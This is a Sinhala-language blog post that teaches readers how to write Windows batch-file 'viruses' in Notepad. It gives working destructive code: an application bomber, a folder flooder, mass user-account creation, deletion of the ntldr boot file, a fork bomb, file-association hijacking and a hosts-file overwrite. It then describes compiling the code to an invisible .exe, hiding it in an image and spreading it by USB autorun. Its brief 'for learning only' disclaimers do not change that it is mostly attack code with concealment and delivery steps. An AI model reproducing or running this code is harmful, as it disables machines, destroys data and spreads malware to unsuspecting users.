Virus එකක ක්‍රියාකාරිත්වය සහ virus සෑදීම

NOTE :- මේ පොස්ට් එක බලල virus ගැන දල අවබෝදයක් ලබා ගන්න.මේ virus හදන්න.එත් මේවගේ ක්‍රියාකාරිත්වය අත්හදා බලන්න යන්න නම් එපා !!!!

Notepad එක බාවිත කර වයිරසයන් නිර්මාණය කිරීම පිලිබද කලින් post එකකත් විස්තර කලා. ප්‍රායෝගිකව මේවායේ දැඩි බලපෑමක් නොමැති උනත් වයිරසයක මූලික ක්‍රියාකාරීත්වය හා කේත සටහන් හසුරවන ආකාරයන් පිලිබදව දල අවබෝදයක් ලබාගැනීමට මේ ක්‍රියාකාරම් ඉවහල් වෙයි

<<< අපි බලමු notepad එක හරහා කේත සටහන් කීපයක් මගින් වයිරසයන් කීපයක් නිර්මාණය කර එය .exe file එක බවට පත් කර ඒ .exe file එක පින්තූරයක් තුල සගවන්නේ කොහොමද කියලා. >>>

මුලින්ම අපි බලමු සරලම කේත කොටසක ක්‍රියාකාරීතවය කොහොමද හා ඒ කේත කොටසම .bat ආකාරයෙන් ක්‍රියාත්මක වන්නේ කොහොමද කියලා. ඔයාලා DOS OPEN කරගන්න. Start > Run > cmd මගින් dos වලට යන්න පුලුවන්. ඊලගට 'cd desktop' කියන command එක මගින් ඔයාලගේ desktop එකට මාරු වෙන්න. ඊලගට පහල command එකත් type කරන්න.

md x
cd x
md y 

md කියන්නේ folder 1k හදන්න බාවිතා කරන command 1 . cd කියන්නේ folder 1න් මාරු වෙන්න බාවිත කරන command 1.

මේ commands ටිකම අපිට notepad එකක ලියලා එය .bat ආකාරයෙන් save කරන්න පුලුවන්.දැන් මෙ save කල .bat  file එක මත double click කලාමත් වෙන්නේ අපි මුලින්ම dos වලින් කරපු දේම තමයි. දැන් ඔයාලට පැහැදිලි ඇති මේ ගැන. ඉතින් මේ ආකාරයෙන් නිර්මාණය කරන්න පුලුවන් .bat file කීපයක් කේත සටහන් පහල ආකාරයෙන් දක්වන්න පුලුවන්.

1. Application Bomber

@echo off
:x
start winword
start mspaint
start notepad
start write
start cmd
start explorer
start control
start calc
goto x

Application Bomber ගණයට වැටෙන වයිරසයන් වල් මූලික ක්‍රියාකාරීත්වය මේ වගෙයි. මෙහිදී සිදු වන්නේ නම් කර ඇති එක් එක් වැඩසටහන් ඉබේම ක්‍රියාත්මක වෙන එකයි. x කියන සංරචකයෙන් මෙය නොනවත්වාම ක්‍රියාත්මක කරනවා. අවසානයේ පරිගනකයේ මතකයට මෙය දරා ගැනීමට නොහැකිව පරිගණකය හිර වෙනවා..

2. Folder flooder

@echo off
:x
md %random%
goto x
මෙතනදී සිදුවන්නේත් දිගින් දිගටම folders නිර්මානය වීමයි. නොනවත්වාම x සංරචකයි නිසා මෙය සිදු වෙනවා. අවසානයේ පරිගනකයේ memoryයට මෙය දරා ගැනීමට නොහැකිව පරිගණකය හිර(struck) වෙනවා. %random% කියන ස්තානයට 1000 දුන්නොත් ඒ කියන්නේ කේතය %%1000% ලෙසින් දුන්නම folders 1000 හැදිලා තමයි නවතින්නෙ.

3.User account flooder

@echo off
:x
net user %random% /add
goto x

මේ ආකාරයේ වයිරසයකින් සිදුවන්නේ පරිගණකයට දරාගන්න නොහැකි ප්‍රමාණයෙන් user accounts දිගින් දිගටම නිර්මාණය කිරීමයි. %random% කියන ස්තානයට අපිට කැමති අගයක් ලබාදෙන්න් පුලුවන්. ඒ ලබාදෙන අගය අනුව user accounts හැදෙනවා.

4. Deleting boot files

පරිගණකය boot වන්න බාවිත කරන system files කීපයෙන් ප්‍රදාන වන්නේ ntldr කියන file එකෙන්. මෙය පවතින්නේ සැගවුන file 1k විදියටයි
ඉතින් මේ ගොනුව මකා දමන්න වයිරසයක් ලියන්න පුලුවන්. කේතය පහල ආකාරයි

attrib -S -R -H C:\ntldr
del ntldr

මේ කේතය .bat  file ලෙසින් save කර ක්‍රියාත්මක කලාම ntldr ගොනුව මැකිලා යනවා. ඊලගට පරිගනකයට boot වෙන්න බැරිව පහල error message එක දෙනවා.

5. Fork Bomb

%0|%0

පරිගණකයේ ක්‍රියාකාරීත්වය අනිසි ආකාරයෙන් ඉහල නන්වන්න මේ කේතය බාවිතා කරන්න පුලුවන්. මේ මගින් පරිගණකයේ Memory වගේම CPU දාරිතාවයත් 100% බාවිතා කරන බව පෙන්නනවා.

6. Extension Changer

මේවගේ ක්‍රියාකාරිත්වය අත්හදා බලන්න යන්න නම් එපා !!!!

@echo off
assoc .txt=anything
assoc .exe=anything
assoc .jpeg=anything
assoc .png=anything
assoc .mpeg=anything
මේක නම් පිස්සුවක්. .txt  file extention එක .jpg ආකාරයෙන් මාරු කරන්න පුලුවන්. ඉතින් ඕනේම ගොනුවක extention එක මේ ආකාරයෙන් මාරු කරගන්න පුලුවන්. පරිගණකයේම සියලුම files .jpg උනොත්? පිස්සු හැදෙන් නැතුව තියෙයිද? anything කියන තැනට අපිට මාරු කරන්න ඕනේ extention එක යොදන්න. උදාහරණයක් ලෙස assoc .txt=.jpg ලෙසින්

7. DNS Poisoning

ඔයාලා දන්නවා පරිගණකයේ hosts කියලා ගොනුවක් තියනවා කියලා. එයි බාවිතා කරන්නෙ අන්තර්ජාල සේවාවන් වෙනුවෙන්. ඉතින් මේ හරහා වෙබ් අඩවි වලට පිවිසීම වාරණය කරන්න පුලුවන්. අපි කරන්න හදන්නේ දැනට බාවිත කරන ජනප්‍රිය වෙබ් අඩවි මේ තුලට රිංගවීම. ඉන්පසු පරිගණකය බාවිතා කරන්නා ඒ වෙබ් අඩවි වෙත යන්න උත්සාහා කලාම යන්න බෑ කියලා error message එක එනවා.

@echo off
echo xxx.xxx.xxx.xxx www.anything.com > C:\windows\system32\drivers\etc\hosts

xxx.xxx.xxx.xxx වෙනුවට IP address එකත් www.anything.com වෙනුවට අපිට වාරණය කල යුතු වෙබ් අඩවි ලිපිනයත් එකතු කරන්න


බොහොමයක් .bat ආකාරයේ files නූතන anti virus softwares මගින් අදුනාගෙන ඉවත් කරනවා. ඉතින් මේවා ලියලා සුරක්ශිත කරද්දිම ඔයාලගේ anti virus softwares මගින් වයිරසයක් ඇවිත් කියලා දැන්වුවොත් බය වෙන්න එපා.

.bat ආකාරයේ වයිරසයන් වල යම් යම් සීමාවන් තියනවා.

1.ප්‍රහාරයට ගොදුරුවන්නාට ඉතාමත් පහසුවෙන් මේ .bat ගොනුව notepad මගින් විවෘත කර බැලීමේ හැකියාව් පවතිනවා

2.නිරන්තරයෙන් dos මෙහෙයුම් පද්දතිය විවෘත වී මේ කේතයන් ක්‍රියාත්මව වන නිසා ප්‍රහාරයට ගොදුරුවන්නාට එය නැවැත්විය හැකියි

ඉතින් මේ සීමාවන් දෙකෙන් .bat වයිරසය බේරා ගැනීමට අපිට කල හැක්කේ කුමද්ද? කල හැකි එකම දේ මෙය වෙනත් extention එකට මාරු කරන්න ඕනේ. ඒ කියන්නෙ .bat extention එක .exe බවට පත් කරන්න ඕනේ. කොහොමද මේක කරන්නේ. ඒවෙනුවෙන් නිර්මාණය කල 3rd party software 1 තමයි Batch To Exe converter කියන්නේ. ඒක පහල link 1න නොමිලේ බාගත කරගන්න පුලුවන්.

Download

මේ software 1 බාගත කරගෙන open කරගන්න. ඊලගට batch file කියන ස්තානයට .bat file 1 තෝරා දෙන්න. Save as කියන ස්තානයට අලුත් .exe file 1 save විය යුතු ස්තානය ලබා දෙන්න. visibility කියන ස්තානයේ 'Invisible application' ලෙසින් තෝරපුවාම .bat වලදී මෙන් dos මෙහෙයුම් පද්දතිය විවෘත වීමක් සිදුවන්නේ නෑ. ඉන්පසුව compile click කරන්න

හොදයි. ඔන්න අපිට ඉහතින් සදහන් කල කේත කොටසක් සහිත වයිරසයක් අඩංගු .exe file 1ක් ලැබුනා. ඉතින් මෙය ක්‍රම කීපයකින් පරිගණක වලට එක් කරන්න පුලුවන්. pen එක හරහා, email මගින් image 1ක සගවා මේවා යවන්න පුලුවන්.

pen එක මගින් මේ වයිරසයන් යවන්න උත්සාහා කරනවා නම් අපි ඔටෝරන් file 1ක් නිර්මාණය කරන්න ඕනේ. notepad එකක් විවෘත කරගන්න. පහත කේත කොටස නිවැරදිව type කරන්න.

[autorun]
open=anything.exe
Icon=anything.ico

anything.exe කියන්නේ ඔයාලාගේ වයිරසයේ නම. මෙය ‘autorun.inf’ ලෙසින් save කරන්න. මේ file 1 හා වයිරස් file 1 pen එකට copy කරන්න. එවිට pen එක තුල autorun.inf ගොනුව හා වයිරස් ගොනුව අඩංගු විය යුතුයි.

මේවා ඉගන ගැනීම වෙනුවෙන් භාවිත කරන්න.අනුන්ට කරදරයක් වෙන විදිහට අත්හදාබලන්න යන්න නම් එපා යාලුවනේ.....

Comment එකක් දාල යන්න අමතක කරන්න එපා.....